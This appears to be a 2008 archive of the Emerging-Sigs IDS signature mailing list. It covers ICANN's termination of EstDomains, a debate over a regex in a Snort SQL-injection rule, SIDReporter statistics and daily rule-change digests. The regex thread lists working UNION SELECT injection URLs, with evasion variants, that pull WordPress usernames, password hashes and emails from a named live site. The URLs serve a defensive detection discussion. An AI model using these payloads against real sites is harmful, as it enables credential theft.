Subject: [Emerging-Sigs] ICANN Terminates EstDomains
Message-ID: <49087486.8080209@jonkmans.com>

As many of you know, EstDomains is/was one of the havens for malware and crime syndicates to register domain names. They used EstDomains because they could falsify their contact information making it difficult for law enforcement to find them, and because EstDomains rarely if ever responded to abuse complaints to suspend domains.

Well, ICANN has terminated EstDomains' registrar agreement for failure to provide and verify contact information of their registrants.

THANK YOU ICANN!! This is a long time coming, but the wheels of bureaucracy move slowly.
Let's applaud ICANN for making this move, and let's encourage them to be looking at the 30 other bad players in the registrations market that make most of the crime possible. Bizcn.com, Joker.com, etc.

More information is available here:

http://www.icann.org/en/compliance/

Well Done ICANN! Please keep after the rest of them, this will have an incredible impact if you keep going!

Matt

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From wolvee_x at yahoo.com Wed Oct 29 10:08:38 2008
From: wolvee_x at yahoo.com (Mahesh Yelsani)
Date: Wed, 29 Oct 2008 08:08:38 -0700 (PDT)
Subject: [Emerging-Sigs] pcre in WEB_SPECIFIC rules
Message-ID: <75253.44173.qm@web59616.mail.ac4.yahoo.com>

Hi,

I observed that in the WEB_SPECIFIC rules the pcre has been changed from UNION.+SELECT to UNION\s+SELECT. When we use UNION\s+SELECT it will catch only when there is a space between UNION and SELECT, but it will not catch all.

For example:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/st_newsletter/stnl_iframe.php"; nocase; uricontent:"?newsletter="; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; pcre:"/UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/6777; reference:url,secunia.com/advisories/32336; sid:2008725; rev:1;)

The above rule catches the following:

http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999 UNION SELECT concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999%20UNION%20SELECT%20concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--

But it will not catch the following exploits, which produce the same results:

http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999/**/UNION/**/SELECT/**/concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+all+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999%20UNION%20all%20SELECT%20concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--

If we use .+ it will catch all of them. Is there any specific reason for using \s+?

Thanks,
Wolvee.
-------------- next part --------------
An HTML attachment was scrubbed...
From emerging at emergingthreats.net Wed Oct 29 15:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Wed, 29 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081029200008.B3A9B4502B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Wed Oct 29 16:00:08 2008 [***]

[+++] Added rules: [+++]

2008732 - ET TROJAN FraudTool.Win32.SysCleaner.a (emerging-virus.rules)
2008733 - ET TROJAN Trojan.Win32.Regrun.ro FTP connection detected (emerging-virus.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (2):
2008732 || ET TROJAN FraudTool.Win32.SysCleaner.a
2008733 || ET TROJAN Trojan.Win32.Regrun.ro FTP connection detected

-> Added to emerging-sid-msg.map.txt (2):
2008732 || ET TROJAN FraudTool.Win32.SysCleaner.a
2008733 || ET TROJAN Trojan.Win32.Regrun.ro FTP connection detected

-> Added to emerging-virus.rules (2):
#ref: c89eec06daf6ceb4ee1cdcd485db9916
#re 05574ba46ca69e91bdeec740cd3af10c

[---] Removed non-rule lines: [---]

-> Removed from emerging-sid-msg.map (4):
2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org
2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org
2500060 || ET COMPROMISED Known Compromised or Hostile Host Traffic (61) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510060 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (61) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Removed from emerging-sid-msg.map.txt (4):
2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org
2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org
2500060 || ET COMPROMISED Known Compromised or Hostile Host Traffic (61) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510060 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (61) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From r.kerr at cranfield.ac.uk Wed Oct 29 15:34:09 2008
From: r.kerr at cranfield.ac.uk (Robert Kerr)
Date: Wed, 29 Oct 2008 20:34:09 +0000
Subject: [Emerging-Sigs] pcre in WEB_SPECIFIC rules
In-Reply-To: <75253.44173.qm@web59616.mail.ac4.yahoo.com>
References: <75253.44173.qm@web59616.mail.ac4.yahoo.com>
Message-ID: <1225312449.8695.18.camel@clarity.local.home>

On Wed, 2008-10-29 at 08:08 -0700, Mahesh Yelsani wrote:
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET
> WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL
> Injection"; flow:to_server,established; content:"GET "; depth:4;
> uricontent:"/st_newsletter/stnl_iframe.php"; nocase;
> uricontent:"?newsletter="; nocase; uricontent:"UNION"; nocase;
> uricontent:"SELECT"; nocase; pcre:"/UNION\s+SELECT/Ui";
> classtype:web-application-attack;
> reference:url,milw0rm.com/exploits/6777;
> reference:url,secunia.com/advisories/32336; sid:2008725; rev:1;)
> The above rule catches the following
> stnl_iframe.php?newsletter=-9999 UNION SELECT
> stnl_iframe.php?newsletter=-9999%20UNION%20SELECT
> But it will not catch the following exploits which produce the same
> results
> stnl_iframe.php?newsletter=-9999+UNION+SELECT

This is an odd one that needs more testing. I would expect the http preprocessor to be normalising + to space in this context. If it isn't in fact doing so it may cause problems for other signatures too. Anyone any insight here?

> stnl_iframe.php?newsletter=-9999/**/UNION/**/SELECT
> stnl_iframe.php?newsletter=-9999+UNION+all+SELECT
> stnl_iframe.php?newsletter=-9999%20UNION%20all%20SELECT

But these are all good examples.
> If we use .+ it will catch all of them, is there any specific reason
> for using \s+

Of course if we use .+ in the general case it can also produce a lot of false positives. For this particular vulnerability, where the newsletter parameter is meant to be numeric, it's probably not too bad. Consider, though, that the parameter was text and could contain something like "soviet union historical data selection". SQL being what it is, there's no easy way we can be 100% accurate with the keywords snort gives us.

You are probably right that it's better to risk the false positives and document them in the rule wiki than risk the false negatives of leaving it with \s+.

I don't see the reason we then need a pcre at all?

pcre:"/UNION.+SELECT/Ui";

Seems equivalent to:

uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; distance:0;

--
Robert Kerr

From jonkman at jonkmans.com Thu Oct 30 09:55:44 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 30 Oct 2008 10:55:44 -0400
Subject: [Emerging-Sigs] SIDReporter Statistics
Message-ID: <4909CAF0.8000606@jonkmans.com>

Thanks to everyone that's been contributing data to the SIDReporter project! I'm just starting to dig the statistical needle out of the haystack, and so far so good. I've put up some static statistics to begin looking at:

http://www.emergingthreats.net/index.php/sidreporter-statistics.html

These will become more interesting the more sites we have reporting, so please consider running the client. It's painless, anonymous, and will contribute to us greatly improving the signature base we all use.

The statistics posted have the dynamic IP lists filtered out, as well as some sigs that aren't really attack relevant. The coloring indicates a signature with more than a 50% change in reporting in the previous period. This should show us some upward and downward movers.

These are static, generated daily for now.
Once we figure out the models that mean something to us I'll get them into a dynamically generated form with charts and graphs which contributors will have access to.

A reminder: only active contributors will have access to the more in-depth analysis and reporting tools that result from this data. So hop into the mix now to have your say as to how we develop those!

You can find more information about SIDReporter here:

http://doc.emergingthreats.net/bin/view/Main/SidReporter

Matt

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From randy at procyonlabs.com Thu Oct 30 11:26:53 2008
From: randy at procyonlabs.com (Randal T. Rioux)
Date: Thu, 30 Oct 2008 12:26:53 -0400 (EDT)
Subject: [Emerging-Sigs] SIDReporter Statistics
In-Reply-To: <4909CAF0.8000606@jonkmans.com>
References: <4909CAF0.8000606@jonkmans.com>
Message-ID: <6a6c6220aad835c5f6a2a84cbdf1f4dd.squirrel@meteor.procyonlabs.com>

On Thu, October 30, 2008 10:55 am, Matt Jonkman wrote:
> Thanks to everyone that's been contributing data to the SIDReporter
> project! I'm just starting to dig the statistical needle out of the
> haystack, and so far so good. I've put up some static statistics to begin
> looking at:
>
> http://www.emergingthreats.net/index.php/sidreporter-statistics.html

This is far more interesting than I initially considered it would be. Nice work, anxious to see it progress.
Randy

From jonkman at jonkmans.com Thu Oct 30 11:36:30 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 30 Oct 2008 12:36:30 -0400
Subject: [Emerging-Sigs] SIDReporter Statistics
In-Reply-To: <6a6c6220aad835c5f6a2a84cbdf1f4dd.squirrel@meteor.procyonlabs.com>
References: <4909CAF0.8000606@jonkmans.com> <6a6c6220aad835c5f6a2a84cbdf1f4dd.squirrel@meteor.procyonlabs.com>
Message-ID: <4909E28E.1050307@jonkmans.com>

I'm eager to see how much more we can get. It's definitely going to be useful information.

We need more diverse submitters though. Everyone please consider taking a minute to install and run the sidreporter. It's secure, anonymous, and painless. :)

Ideas on other ways to slice and dice this data? I'm moving into numbers of unique sources for the attack/scan/exploit sigs. Takes some time to define who's the bad side in each sid, but once done I'll get some entropy numbers up for those.

More sources == MUCH better stats!

Matt

Randal T. Rioux wrote:
> On Thu, October 30, 2008 10:55 am, Matt Jonkman wrote:
>> Thanks to everyone that's been contributing data to the SIDReporter
>> project! I'm just starting to dig the statistical needle out of the
>> haystack, and so far so good. I've put up some static statistics to begin
>> looking at:
>>
>> http://www.emergingthreats.net/index.php/sidreporter-statistics.html
>
> This is far more interesting than I initially considered it would be. Nice
> work, anxious to see it progress.
>
> Randy
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From jlewis at packetnexus.com Thu Oct 30 13:31:22 2008
From: jlewis at packetnexus.com (Jason Lewis)
Date: Thu, 30 Oct 2008 14:31:22 -0400
Subject: [Emerging-Sigs] SIDReporter Statistics
In-Reply-To: <4909E28E.1050307@jonkmans.com>
References: <4909CAF0.8000606@jonkmans.com> <6a6c6220aad835c5f6a2a84cbdf1f4dd.squirrel@meteor.procyonlabs.com> <4909E28E.1050307@jonkmans.com>
Message-ID: <4909FD7A.3080900@packetnexus.com>

Are you looking for things beyond the common breakdowns by AS, CIDR and Country?

jas

Matt Jonkman wrote:
> I'm eager to see how much more we can get. It's definitely going to be
> useful information.
>
> We need more diverse submitters though. Everyone please consider taking
> a minute to install and run the sidreporter. It's secure, anonymous, and
> painless. :)
>
> Ideas on other ways to slice and dice this data? I'm moving into numbers
> of unique sources for the attack/scan/exploit sigs. Takes some time to
> define who's the bad side in each sid, but once done I'll get some
> entropy numbers up for those.
>
> More sources == MUCH better stats!
>
> Matt
>
> Randal T. Rioux wrote:
>
>> On Thu, October 30, 2008 10:55 am, Matt Jonkman wrote:
>>
>>> Thanks to everyone that's been contributing data to the SIDReporter
>>> project! I'm just starting to dig the statistical needle out of the
>>> haystack, and so far so good.
>>> I've put up some static statistics to begin
>>> looking at:
>>>
>>> http://www.emergingthreats.net/index.php/sidreporter-statistics.html
>>>
>> This is far more interesting than I initially considered it would be. Nice
>> work, anxious to see it progress.
>>
>> Randy
>>
>

From jonkman at jonkmans.com Thu Oct 30 13:35:11 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 30 Oct 2008 14:35:11 -0400
Subject: [Emerging-Sigs] SIDReporter Statistics
In-Reply-To: <4909FD7A.3080900@packetnexus.com>
References: <4909CAF0.8000606@jonkmans.com> <6a6c6220aad835c5f6a2a84cbdf1f4dd.squirrel@meteor.procyonlabs.com> <4909E28E.1050307@jonkmans.com> <4909FD7A.3080900@packetnexus.com>
Message-ID: <4909FE5F.5050701@jonkmans.com>

I will be, but not yet. I'm very interested in getting some stats up to the asn level for reputation purposes. Country will be interesting, wonder if that'd be reliable enough to act upon? Likely asn would be the largest block safe to make decisions on, and /24 the biggest I'd personally block on. But we'll have to see how the numbers work out.

Contributors will get access to all of the statistics we can share, so hop in! :)

Matt

Jason Lewis wrote:
> Are you looking for things beyond the common breakdowns by AS, CIDR and
> Country?
>
> jas
>
> Matt Jonkman wrote:
>> I'm eager to see how much more we can get. It's definitely going to be
>> useful information.
>>
>> We need more diverse submitters though. Everyone please consider taking
>> a minute to install and run the sidreporter. It's secure, anonymous, and
>> painless. :)
>>
>> Ideas on other ways to slice and dice this data? I'm moving into numbers
>> of unique sources for the attack/scan/exploit sigs.
>> Takes some time to
>> define who's the bad side in each sid, but once done I'll get some
>> entropy numbers up for those.
>>
>> More sources == MUCH better stats!
>>
>> Matt
>>
>> Randal T. Rioux wrote:
>>
>>> On Thu, October 30, 2008 10:55 am, Matt Jonkman wrote:
>>>
>>>> Thanks to everyone that's been contributing data to the SIDReporter
>>>> project! I'm just starting to dig the statistical needle out of the
>>>> haystack, and so far so good. I've put up some static statistics to begin
>>>> looking at:
>>>>
>>>> http://www.emergingthreats.net/index.php/sidreporter-statistics.html
>>>>
>>> This is far more interesting than I initially considered it would be. Nice
>>> work, anxious to see it progress.
>>>
>>> Randy
>>>
>>
>

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From dxp2532 at gmail.com Thu Oct 30 13:46:24 2008
From: dxp2532 at gmail.com (dxp)
Date: Thu, 30 Oct 2008 14:46:24 -0400
Subject: [Emerging-Sigs] ET POLICY PE EXE signatures
Message-ID: <1225392384.6828.3.camel@kinta>

http://doc.emergingthreats.net/2000427
http://doc.emergingthreats.net/2000419

Seems like these two are more or less the same stuff. Wouldn't it make more sense to combine into one?
I noticed this while looking at the SidReporter statistics. I think having one signature to detect any PE executable is more efficient as well as better for statistics.

-

-=[ dxp ]=-
0xA3F3C6E3
From jonkman at jonkmans.com Thu Oct 30 14:07:44 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 30 Oct 2008 15:07:44 -0400
Subject: [Emerging-Sigs] ET POLICY PE EXE signatures
In-Reply-To: <1225392384.6828.3.camel@kinta>
References: <1225392384.6828.3.camel@kinta>
Message-ID: <490A0600.1050702@jonkmans.com>

You're right, and I think 2000419 appears to be the more accurate one. I'll drop 2000427 barring any objections to eliminate the duplicated effort.

Already getting good stuff out of SIDReporter!!

Matt

dxp wrote:
> http://doc.emergingthreats.net/2000427
> http://doc.emergingthreats.net/2000419
>
> Seems like these two are more or less the same stuff. Wouldn't it make
> more sense to combine into one?
> I noticed this while looking at the SidReporter statistics. I think
> having one signature to detect any PE executable is more efficient as
> well as better for statistics.
>
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc

From emerging at emergingthreats.net Thu Oct 30 15:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Thu, 30 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081030200008.88E764502D@goliath.jonkmans.com>

[***] Results from Oinkmaster started Thu Oct 30 16:00:08 2008 [***]

[///] Modified active rules: [///]

2002395 - ET MALWARE Miva User Agent (TPSystem) (emerging-malware.rules)

[---] Disabled rules: [---]

2000427 - ET POLICY PE EXE Install Windows file download (emerging-policy.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-policy.rules (1):
#Disabling as it overlaps with 2000419

From emerging at emergingthreats.net Fri Oct 31 15:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri, 31 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081031200008.145F24502B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Fri Oct 31 16:00:08 2008 [***]

[+++] Added rules: [+++]

2008734 - ET MALWARE Suspicious User-Agent Detected (WINS_HTTP_SEND Program/1.0) (emerging-malware.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (1):
2008734 || ET MALWARE Suspicious User-Agent Detected (WINS_HTTP_SEND Program/1.0)

-> Added to emerging-sid-msg.map.txt (1):
2008734 || ET MALWARE Suspicious User-Agent Detected (WINS_HTTP_SEND Program/1.0)

[---] Removed non-rule lines: [---]

-> Removed from emerging-sid-msg.map (4):
2500058 || ET COMPROMISED Known Compromised or Hostile Host Traffic (59) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500059 || ET COMPROMISED Known Compromised or Hostile Host Traffic (60) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510058 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (59) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510059 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (60) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Removed from emerging-sid-msg.map.txt (4):
2500058 || ET COMPROMISED Known Compromised or Hostile Host Traffic (59) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500059 || ET COMPROMISED Known Compromised or Hostile Host Traffic (60) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510058 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (59) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510059 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (60) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts